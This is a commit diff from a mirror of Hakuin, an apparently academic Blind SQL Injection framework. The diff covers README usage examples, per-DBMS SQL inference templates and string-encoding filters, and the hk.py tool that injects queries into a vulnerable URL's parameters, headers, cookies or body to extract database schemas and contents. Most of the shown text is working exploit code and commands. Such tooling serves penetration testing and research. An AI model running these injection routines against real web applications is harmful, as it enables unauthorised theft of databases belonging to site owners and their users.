1
0
mirror of https://github.com/pruzko/hakuin synced 2024-09-08 03:30:41 +02:00

regression tests, custom requester in hk, build refactor, restructure, bug fixes

This commit is contained in:
Jakub Pruzinec 2024-07-25 17:58:16 +02:00
parent 3b7b76dcbf
commit 1a8fc920d7
126 changed files with 1287 additions and 1112 deletions

View File

@ -2,7 +2,7 @@
<img width="150" src="https://raw.githubusercontent.com/pruzko/hakuin/main/logo.png">
</p>
Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism and more.
Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework and tool written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism, and more.
Hakuin has been presented at esteemed academic and industrial conferences:
- [BlackHat MEA, Riyadh](https://blackhatmea.com/session/hakuin-injecting-brain-blind-sql-injection), 2023
@ -16,17 +16,26 @@ More information can be found in our [paper](https://github.com/pruzko/hakuin/bl
To install Hakuin, simply run:
```
pip3 install hakuin
hk -h
```
Developers should install the package locally and set the `-e` flag for editable mode:
Note that installation is optional and you can use Hakuin directly from the source codes:
```
git clone git@github.com:pruzko/hakuin.git
git clone https://github.com/pruzko/hakuin
cd hakuin
pip3 install -e .
python3 hk.py -h
```
## Command Line Tool
Hakuin ships with an intuitive tool called `hk` that offers most of Hakuin's features directly from the command line. To find out more, run:
```
hk -h
```
## Examples
Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from the `Requester` and override the `request` method. Also, the method must determine whether the query resolved to `True` or `False`.
## Custom Scripting
Sometimes, BSQLI vunerabilities are too tricky to be exploited from the command line and require custom scripting. This is where Hakuin's Python package shines, giving you total control over the extraction process.
To customize exploitation, you need to instruct Hakuin on how to inject its queries. This is done by deriving a class from the `Requester` and overriding the `request` method. Aside from injecting queries, the method must determine whether they resolved to `True` or `False`.
##### Example 1 - Query Parameter Injection with Status-based Inference
@ -61,10 +70,7 @@ class StatusRequester(Requester):
...
async def main():
# requester: Use this Requester
# dbms: Use this DBMS
# n_tasks: Spawns N tasks that extract column rows in parallel
ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
ext = Extractor(requester=StatusRequester(), dbms=SQLite())
...
if __name__ == '__main__':
@ -73,72 +79,39 @@ if __name__ == '__main__':
Now that eveything is set, you can start extracting DB metadata.
##### Example 1 - Extracting DB Schemas
##### Example 1 - Extracting DB Schemas/Tables/Columns
```python
# strategy:
# 'binary': Use binary search
# 'model': Use pre-trained model
schema_names = await ext.extract_schema_names(strategy='model')
schema_names = await ext.extract_schema_names(strategy='model') # extracts schema names
tables = await ext.extract_table_names(strategy='model') # extracts table names
columns = await ext.extract_column_names(table='users', strategy='model') # extracts column names
metadata = await ext.extract_meta(strategy='model') # extracts all table and column names
```
##### Example 2 - Extracting Tables
```python
tables = await ext.extract_table_names(strategy='model')
```
Once you know the DB structure, you can extract the actual content.
##### Example 3 - Extracting Columns
```python
columns = await ext.extract_column_names(table='users', strategy='model')
```
##### Example 4 - Extracting Tables and Columns Together
```python
metadata = await ext.extract_meta(strategy='model')
```
Once you know the structure, you can extract the actual content.
##### Example 1 - Extracting Generic Columns
##### Example 1 - Extracting Column Data
```python
# text_strategy: Use this strategy if the column is text
res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')
```
res = await ext.extract_column(table='users', column='address', text_strategy='dynamic') # detects types and extracts columns
##### Example 2 - Extracting Textual Columns
```python
# strategy:
# 'binary': Use binary search
# 'fivegram': Use five-gram model
# 'unigram': Use unigram model
# 'dynamic': Dynamically identify the best strategy. This setting
# also enables opportunistic guessing.
res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')
```
##### Example 3 - Extracting Integer Columns
```python
res = await ext.extract_column_int(table='users', column='id')
```
##### Example 4 - Extracting Float Columns
```python
res = await ext.extract_column_float(table='products', column='price')
```
##### Example 5 - Extracting Blob (Binary Data) Columns
```python
res = await ext.extract_column_blob(table='users', column='id')
res = await ext.extract_column_text(table='users', column='address', strategy='dynamic') # extracts text columns
res = await ext.extract_column_int(table='users', column='id') # extracts int columns
res = await ext.extract_column_float(table='products', column='price') # extracts float columns
res = await ext.extract_column_blob(table='users', column='id') # extracts blob columns
```
More examples can be found in the `tests` directory.
## Using Hakuin from the Command Line
Hakuin comes with a simple wrapper tool, `hk.py`, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run:
```
python3 hk.py -h
```
## For Researchers
This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the [frozen version](https://zenodo.org/record/7804243) as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.

View File

Can't render this file because it is too large.

View File

Can't render this file because it is too large.

View File

Can't render this file because it is too large.

View File

Can't render this file because it is too large.

View File

@ -1,5 +1,4 @@
import asyncio
import logging
import os
import pickle
@ -41,13 +40,9 @@ class Model:
Params:
file (str): model file
'''
logging.info(f'Loading model "{file}".')
with open(file, 'rb') as f:
self.model = pickle.load(f)
logging.info(f'Model loaded.')
async def scores(self, context):
'''Calculates likelihood distribution of next value.

View File

@ -19,3 +19,21 @@ class Requester(metaclass=ABCMeta):
bool: query result
'''
raise NotImplementedError()
class HKRequester(Requester):
'''Abstract class for requesters that can be loaded by hk.py.'''
def __init__(self):
'''Constructor.'''
self.n_requests = 0
async def initialize(self):
'''Async initialization. This method is called by "hk.py"'''
pass
async def cleanup(self):
'''Async clean-up. This method is called by "hk.py"'''
pass

View File

@ -1,4 +1,4 @@
from hakuin.Model import Model
from hakuin.Model import get_model_tables, get_model_columns, get_model_schemas
from hakuin.Extractor import Extractor
from hakuin.Requester import Requester
from hakuin.Requester import Requester, HKRequester

View File

@ -1,5 +1,6 @@
import asyncio
import logging
import tqdm
import sys
from abc import ABCMeta, abstractmethod
from copy import deepcopy
@ -73,7 +74,7 @@ class Collector(metaclass=ABCMeta):
Returns:
list: column rows
'''
logging.info(f'Inferring "{ctx.table}.{ctx.column}"')
tqdm.tqdm.write(f'Extracting [{ctx.table}].[{ctx.column}]', file=sys.stderr)
if ctx.n_rows is None:
ctx.n_rows = await NumericBinarySearch(
@ -88,15 +89,16 @@ class Collector(metaclass=ABCMeta):
if ctx.rows_have_null is None:
ctx.rows_have_null = await self.check_rows_have_null(ctx)
data = [None] * ctx.n_rows
await asyncio.gather(
*[self.task_collect_row(deepcopy(ctx), data) for _ in range(self.n_tasks)]
)
with tqdm.tqdm(total=ctx.n_rows, file=sys.stderr, leave=False) as progress:
data = [None] * ctx.n_rows
await asyncio.gather(
*[self._task_collect_row(deepcopy(ctx), data, progress) for _ in range(self.n_tasks)]
)
return data
async def task_collect_row(self, ctx, data):
async def _task_collect_row(self, ctx, data, progress):
while True:
async with self._row_idx_ctr_lock:
if self._row_idx_ctr >= ctx.n_rows:
@ -112,7 +114,8 @@ class Collector(metaclass=ABCMeta):
async with self._data_lock:
data[ctx.row_idx] = res
logging.info(f'({ctx.row_idx + 1}/{ctx.n_rows}) "{ctx.table}.{ctx.column}": {res}')
progress.update(1)
progress.write(f'({ctx.row_idx + 1}/{ctx.n_rows}) [{ctx.table}].[{ctx.column}]: {res}', file=sys.stderr)
@abstractmethod

View File

@ -1,57 +0,0 @@
import asyncio
import os
import pickle
from nltk.lm import MLE
import hakuin
DIR_FILE = os.path.dirname(os.path.realpath(__file__))
DIR_DATA = os.path.abspath(os.path.join(DIR_FILE, '..'))
DIR_CORPORA = os.path.join(DIR_DATA, 'corpora')
DIR_MODELS = os.path.join(DIR_DATA, 'models')
def fetch_data(fname):
with open(fname, 'r') as f:
data = [l.strip() for l in f]
data = [d.split(',') for d in data]
data = [x for d in data for x in [d[0]] * int(d[1])]
return data
async def main():
print('Schemas...')
data = fetch_data(os.path.join(DIR_CORPORA, 'schemas.csv'))
m = hakuin.Model(5)
await m.fit_data(data)
with open(os.path.join(DIR_MODELS, 'model_schemas.pkl'), 'wb') as f:
pickle.dump(m.model, f)
print('Done.')
print('Tables...')
data = fetch_data(os.path.join(DIR_CORPORA, 'tables.csv'))
m = hakuin.Model(5)
await m.fit_data(data)
with open(os.path.join(DIR_MODELS, 'model_tables.pkl'), 'wb') as f:
pickle.dump(m.model, f)
print('Done.')
print('Columns...')
data = fetch_data(os.path.join(DIR_CORPORA, 'columns.csv'))
m = hakuin.Model(5)
await m.fit_data(data)
with open(os.path.join(DIR_MODELS, 'model_columns.pkl'), 'wb') as f:
pickle.dump(m.model, f)
print('Done.')
if __name__ == '__main__':
asyncio.run(main())

View File

@ -1,17 +0,0 @@
{% set single_row = true %}
{% extends 'base.jinja' %}
{% block select %}
SELECT CASE WHEN
{% if not has_eos %}
{{ column | sql_to_varchar | sql_len }} != {{ ctx.buffer | length }}
AND
{{ column | sql_to_varchar | sql_char_at(ctx.buffer | length) | sql_in_str(values | sql_str_lit) }} > 0
{% elif not values %}
{{ column | sql_to_varchar | sql_len }} = {{ ctx.buffer | length }}
{% else %}
{{ column | sql_to_varchar | sql_char_at(ctx.buffer | length) | sql_in_str(values | sql_str_lit) }} > 0
{% endif %}
THEN 1 ELSE 0 END
{% endblock %}

View File

@ -3,7 +3,7 @@ import re
import jinja2
from abc import ABCMeta, abstractmethod
from hakuin.utils import DIR_QUERIES, BYTE_MAX
from hakuin.utils import BYTE_MAX
@ -31,18 +31,18 @@ class DBMS(metaclass=ABCMeta):
self.jj.filters['sql_to_unicode'] = self.sql_to_unicode
@staticmethod
def normalize(s):
return DBMS._RE_NORMALIZE.sub(' ', s).strip()
@classmethod
def normalize(cls, s):
return cls._RE_NORMALIZE.sub(' ', s).strip()
# Template Filters
@staticmethod
def sql_escape(s):
@classmethod
def sql_escape(cls, s):
if s is None:
return None
if DBMS._RE_ESCAPE.match(s):
if cls._RE_ESCAPE.match(s):
return s
assert ']' not in s, f'Cannot escape "{s}"'
@ -50,7 +50,7 @@ class DBMS(metaclass=ABCMeta):
@staticmethod
def sql_str_lit(s):
if not s.isascii() or not s.isprintable() or "'" in s:
if not s.isascii() or not s.isprintable() or any(c in s for c in "?:'"):
return f"x'{s.encode('utf-8').hex()}'"
return f"'{s}'"
@ -75,9 +75,9 @@ class DBMS(metaclass=ABCMeta):
def sql_in_str(s, string):
return f'instr({string}, {s})'
@staticmethod
def sql_in_str_set(s, strings):
return f'{s} in ({",".join([DBMS.sql_str_lit(x) for x in strings])})'
@classmethod
def sql_in_str_set(cls, s, strings):
return f'{s} in ({",".join([cls.sql_str_lit(x) for x in strings])})'
@staticmethod
def sql_is_ascii(s):

View File

@ -27,9 +27,9 @@ class MSSQL(DBMS):
# Template Filters
@staticmethod
def sql_str_lit(s):
if not s.isascii() or "'" in s:
hex_str = s.encode('cp1252').hex()
return f'convert(varchar(MAX), 0x{hex_str})'
if not s.isascii() or not s.isprintable() or any(c in s for c in "?:'"):
hex_str = s.encode('utf-16').hex()
return f'convert(nvarchar(MAX), 0x{hex_str})'
return f"'{s}'"
@staticmethod
@ -42,21 +42,21 @@ class MSSQL(DBMS):
@staticmethod
def sql_in_str(s, string):
return f'charindex({s},{string} COLLATE Latin1_General_BIN)'
return f'charindex({s},{string} COLLATE Latin1_General_CS_AS)'
@staticmethod
def sql_in_str_set(s, strings):
return f'{s} COLLATE Latin1_General_BIN in ({",".join([MSSQL.sql_str_lit(x) for x in strings])})'
@classmethod
def sql_in_str_set(cls, s, strings):
return f'{s} COLLATE Latin1_General_CS_AS in ({",".join([cls.sql_str_lit(x) for x in strings])})'
@staticmethod
def sql_is_ascii(s):
# MSSQL does not have native "isascii" function. As a workaround we try to look for
# non-ascii characters with "%[^\x00-0x7f]%" patterns.
return f'CASE WHEN patindex(\'%[^\'+char(0x00)+\'-\'+char(0x7f)+\']%\' COLLATE Latin1_General_BIN,{s}) = 0 THEN 1 ELSE 0 END'
return f"CASE WHEN patindex('%[^'+char(0x00)+'-'+char(0x7f)+']%' COLLATE Latin1_General_BIN,{s}) = 0 THEN 1 ELSE 0 END"
@staticmethod
def sql_to_varchar(s):
return f'cast({s} as varchar(MAX))'
return f'convert(nvarchar(MAX), {s})'
# Queries
@ -73,7 +73,7 @@ class MSSQL(DBMS):
return self.q_column_type_in_str_set(ctx, types=types)
def q_column_is_text(self, ctx):
types = ['char', 'nchar' 'varchar', 'nvarchar', 'text', 'ntext']
types = ['char', 'nchar', 'varchar', 'nvarchar', 'text', 'ntext']
return self.q_column_type_in_str_set(ctx, types=types)
def q_column_is_blob(self, ctx):
@ -115,7 +115,6 @@ class MSSQL(DBMS):
def q_string_in_set(self, ctx, values):
query = self.jj_mssql.get_template('string_in_set.jinja').render(ctx=ctx, values=values)
print(self.normalize(query))
return self.normalize(query)
def q_int_lt(self, ctx, n):

View File

@ -37,7 +37,7 @@ class MySQL(DBMS):
@staticmethod
def sql_str_lit(s):
if not s.isascii() or not s.isprintable() or "'" in s:
if not s.isascii() or not s.isprintable() or any(c in s for c in "?:'"):
return f"x'{s.encode('utf-8').hex()}'"
return f"'{s}'"
@ -122,7 +122,6 @@ class MySQL(DBMS):
def q_string_in_set(self, ctx, values):
query = self.jj_mysql.get_template('string_in_set.jinja').render(ctx=ctx, values=values)
print(self.normalize(query))
return self.normalize(query)
def q_int_lt(self, ctx, n):

View File

@ -31,7 +31,7 @@ class PSQL(DBMS):
@staticmethod
def sql_str_lit(s):
if not s.isascii() or not s.isprintable() or "'" in s:
if not s.isascii() or not s.isprintable() or any(c in s for c in "?:'"):
return f"convert_from('\\x{s.encode('utf-8').hex()}', 'UTF8')"
return f"'{s}'"

View File

@ -20,7 +20,7 @@ class SQLite(DBMS):
# Template Filters
@staticmethod
def sql_str_lit(s):
if not s.isascii() or not s.isprintable() or "'" in s:
if not s.isascii() or not s.isprintable() or any(c in s for c in "?:'"):
return f"cast(x'{s.encode('utf-8').hex()}' as TEXT)"
return f"'{s}'"
@ -29,9 +29,9 @@ class SQLite(DBMS):
assert n in range(BYTE_MAX + 1), f'n must be in [0, {BYTE_MAX}]'
return f"x'{n:02x}'"
@staticmethod
def sql_in_str_set(s, strings):
return f'{s} in ({",".join([SQLite.sql_str_lit(x) for x in strings])})'
@classmethod
def sql_in_str_set(cls, s, strings):
return f'{s} in ({",".join([cls.sql_str_lit(x) for x in strings])})'
@staticmethod
def sql_is_ascii(s):
@ -52,7 +52,7 @@ class SQLite(DBMS):
return self.q_column_type_in_str_set(ctx, types=['integer'])
def q_column_is_float(self, ctx):
return self.q_column_type_in_str_set(ctx, types=['real'])
return self.q_column_type_in_str_set(ctx, types=['real', 'float'])
def q_column_is_text(self, ctx):
return self.q_column_type_in_str_set(ctx, types=['text'])

View File

@ -45,7 +45,7 @@
{% block offset %}
{% if single_row %}
ORDER BY {{ column | sql_to_varchar }}
ORDER BY (SELECT NULL)
OFFSET {{ ctx.row_idx }} ROWS
FETCH NEXT 1 ROWS ONLY
{% endif %}

View File

@ -5,12 +5,12 @@
{% block select %}
SELECT CASE WHEN
{% if not has_eos %}
{{ column | sql_to_varchar | sql_len }} != {{ ctx.buffer | length }}
AND
{{ column | sql_to_varchar | sql_char_at(ctx.buffer | length) | sql_in_str(values | sql_str_lit) }} > 0
{% elif not values %}
{{ column | sql_to_varchar | sql_len }} = {{ ctx.buffer | length }}
{% else %}
{{ column | sql_to_varchar | sql_len }} = {{ ctx.buffer | length }}
OR
{{ column | sql_to_varchar | sql_char_at(ctx.buffer | length) | sql_in_str(values | sql_str_lit) }} > 0
{% endif %}
THEN 1 ELSE 0 END

View File

@ -0,0 +1,17 @@
{% set single_row = true %}
{% extends 'base.jinja' %}
{% block select %}
SELECT CASE WHEN
{% if not has_eos %}
{{ column | sql_to_varchar | sql_char_at(ctx.buffer | length) | sql_in_str(values | sql_str_lit) }} > 0
{% elif not values %}
{{ column | sql_to_varchar | sql_len }} = {{ ctx.buffer | length }}
{% else %}
{{ column | sql_to_varchar | sql_len }} = {{ ctx.buffer | length }}
OR
{{ column | sql_to_varchar | sql_char_at(ctx.buffer | length) | sql_in_str(values | sql_str_lit) }} > 0
{% endif %}
THEN 1 ELSE 0 END
{% endblock %}

View File

@ -5,8 +5,9 @@ import string
DIR_FILE = os.path.dirname(os.path.realpath(__file__))
DIR_ROOT = os.path.abspath(os.path.join(DIR_FILE, '..'))
DIR_MODELS = os.path.join(DIR_ROOT, 'data', 'models')
DIR_QUERIES = os.path.join(DIR_ROOT, 'data', 'queries')
DIR_QUERIES = os.path.join(DIR_ROOT, 'dbms', 'queries')
DIR_MODELS = os.path.join(DIR_ROOT, 'models')
DIR_MODELS = DIR_MODELS if os.path.isdir(DIR_MODELS) else os.path.abspath(os.path.join(DIR_ROOT, '..', 'models'))
ASCII_MAX = 0x7f
UNICODE_MAX = 0x10ffff

96
hk.py
View File

@ -1,15 +1,18 @@
import argparse
import asyncio
import importlib.util
import inspect
import json
import logging
import re
import requests
import sys
import tqdm
import urllib.parse
import aiohttp
from hakuin.dbms import SQLite, MySQL, MSSQL, PSQL
from hakuin import Extractor, Requester
from hakuin import Extractor, HKRequester
@ -19,13 +22,14 @@ class BytesEncoder(json.JSONEncoder):
class UniversalRequester(Requester):
class UniversalRequester(HKRequester):
RE_INFERENCE = re.compile(r'^(not_)?(.+):(.*)$')
RE_QUERY_TAG = re.compile(r'{query}')
def __init__(self, http, args):
self.http = http
def __init__(self, args):
super().__init__()
self.http = None
self.url = args.url
self.method = args.method
self.headers = self._process_dict(args.headers)
@ -33,12 +37,16 @@ class UniversalRequester(Requester):
self.body = args.body
self.inference = self._process_inference(args.inference)
self.dbg = args.dbg
self.n_requests = 0
@staticmethod
async def _init_http():
return aiohttp.ClientSession()
async def initialize(self):
self.http = aiohttp.ClientSession()
async def cleanup(self):
if self.http:
await self.http.close()
self.http = None
def _process_dict(self, dict_str):
@ -70,13 +78,15 @@ class UniversalRequester(Requester):
async def request(self, ctx, query):
self.n_requests += 1
url = self.RE_QUERY_TAG.sub(requests.utils.quote(query), self.url)
url = self.RE_QUERY_TAG.sub(urllib.parse.quote(query), self.url)
headers = {self.RE_QUERY_TAG.sub(query, k): self.RE_QUERY_TAG.sub(query, v) for k, v in self.headers.items()}
cookies = {self.RE_QUERY_TAG.sub(query, k): self.RE_QUERY_TAG.sub(query, v) for k, v in self.cookies.items()}
body = self.RE_QUERY_TAG.sub(query, self.body) if self.body else None
async with self.http.request(method=self.method, url=url, headers=headers, cookies=cookies, data=body) as resp:
assert resp.status in [200, 404], 'TODO DELME'
if resp.status not in [200, 404]:
tqdm.tqdm.write(f'(err) {query}')
raise AssertionError(f'Invalid response code: {resp.status}')
if self.inference['type'] == 'status':
result = resp.status == self.inference['content']
@ -90,7 +100,7 @@ class UniversalRequester(Requester):
result = not result
if self.dbg:
print(result, '(err)' if resp.status == 500 else '', query, file=sys.stderr)
tqdm.tqdm.write(f'{self.n_requests} {"(err)" if resp.status == 500 else str(result)[0]} {query}')
return result
@ -109,16 +119,24 @@ class HK:
self.ext = None
async def main(self, args):
async with aiohttp.ClientSession() as http:
requester = UniversalRequester(http, args)
dbms = self.DBMS_DICT[args.dbms]()
self.ext = Extractor(requester, dbms, args.tasks)
async def run(self, args):
if args.requester:
requester = self._load_requester(args)
else:
requester = UniversalRequester(args)
await self._main(args)
await requester.initialize()
dbms = self.DBMS_DICT[args.dbms]()
self.ext = Extractor(requester, dbms, args.tasks)
try:
await self._run(args)
finally:
await requester.cleanup()
async def _main(self, args):
async def _run(self, args):
if args.extract == 'data':
if args.column:
res = await self.ext.extract_column(table=args.table, column=args.column, schema=args.schema, text_strategy=args.text_strategy)
@ -135,7 +153,12 @@ class HK:
elif args.extract == 'columns':
res = await self.ext.extract_column_names(table=args.table, schema=args.schema, strategy=args.meta_strategy)
print(f'Number of requests: {self.ext.requester.n_requests}')
res = {
'stats': {
'n_requests': self.ext.requester.n_requests,
},
'data': res,
}
print(json.dumps(res, cls=BytesEncoder, indent=4))
@ -157,8 +180,27 @@ class HK:
return res
def _load_requester(self, args):
assert ':' in args.requester, f'Invalid requester format (path/to/requester.py:MyHKRequesterClass): "{args.requester}"'
req_path, req_cls = args.requester.rsplit(':', -1)
if __name__ == '__main__':
spec = importlib.util.spec_from_file_location('_custom_requester', req_path)
assert spec, f'Failed to locate "{req_path}"'
module = importlib.util.module_from_spec(spec)
assert module, f'Failed to locate "{req_path}"'
spec.loader.exec_module(module)
for cls_name, obj in inspect.getmembers(module, inspect.isclass):
if cls_name != req_cls:
continue
if issubclass(obj, HKRequester) and obj is not HKRequester:
return obj()
raise ValueError(f'HKRequester class "{req_cls}" not found in "{req_path}".')
def main():
parser = argparse.ArgumentParser(description='A simple wrapper to easily call Hakuin\'s basic functionality.')
parser.add_argument('url', help='URL pointing to a vulnerable endpoint. The URL can contain the {query} tag, which will be replaced with injected queries.')
parser.add_argument('-T', '--tasks', default=1, type=int, help='Run several coroutines in parallel.')
@ -167,7 +209,7 @@ if __name__ == '__main__':
parser.add_argument('-H', '--headers', help='Headers attached to requests. The header names and values can contain the {query} tag.')
parser.add_argument('-C', '--cookies', help='Cookies attached to requests. The cookie names and values can contain the {query} tag.')
parser.add_argument('-B', '--body', help='Request body. The body can contain the {query} tag.')
parser.add_argument('-i', '--inference', required=True, help=''
parser.add_argument('-i', '--inference', help=''
'Inference method that determines the results of injected queries. The method must be in the form of "<TYPE>:<CONTENT>", where the <TYPE> '
'can be "status", "header", or "body" and the <CONTENT> can be a status code or a string to look for in HTTP responses. Also, the <TYPE> '
'can be prefixed with "not_" to negate the expression. Examples: "status:200" (check if the response status code is 200), "not_status:404" '
@ -189,6 +231,8 @@ if __name__ == '__main__':
'Use this strategy to extract text columns. If not provided, "dynamic" is used.'
)
parser.add_argument('-R', '--requester', help='Use custom HKRequester class (see Requester.py) instead of the default one. '
'Example: path/to/requester.py:MyHKRequesterClass')
# parser.add_argument('-o', '--out', help='Output directory.')
parser.add_argument('--dbg', action='store_true', help='Print debug information to stderr.')
args = parser.parse_args()
@ -208,5 +252,11 @@ if __name__ == '__main__':
assert args.tasks > 0, 'The --tasks parameter must be positive.'
assert args.inference or args.requester, 'You must provide -i/--inference or -R/--requester.'
logging.basicConfig(level=logging.INFO)
asyncio.get_event_loop().run_until_complete(HK().main(args))
asyncio.get_event_loop().run_until_complete(HK().run(args))
if __name__ == '__main__':
main()

41
models/train_models.py Normal file
View File

@ -0,0 +1,41 @@
import asyncio
import os
import pickle
import sys
import tqdm
from nltk.lm import MLE
from hakuin import Model
from hakuin.utils import DIR_MODELS
DIR_FILE = os.path.dirname(os.path.realpath(__file__))
DIR_ROOT = os.path.abspath(os.path.join(DIR_FILE, '..'))
DIR_CORPORA = os.path.join(DIR_ROOT, 'corpora')
def fetch_data(fname):
with open(fname, 'r') as f:
data = [l.strip() for l in f]
data = [d.split(',') for d in data]
data = [x for d in data for x in [d[0]] * int(d[1])]
return data
async def main():
for m_type in tqdm.tqdm(['schemas', 'tables', 'columns']):
tqdm.tqdm.write(f'Training {m_type}. This may take a while...', file=sys.stderr)
data = fetch_data(os.path.join(DIR_CORPORA, f'{m_type}.csv'))
m = Model(5)
await m.fit_data(data)
tqdm.tqdm.write(f'Saving {m_type}...', file=sys.stderr)
with open(os.path.join(DIR_MODELS, f'model_{m_type}.pkl'), 'wb') as f:
pickle.dump(m.model, f)
tqdm.tqdm.write(f'Done.', file=sys.stderr)
if __name__ == '__main__':
asyncio.run(main())

Some files were not shown because too many files have changed in this diff Show More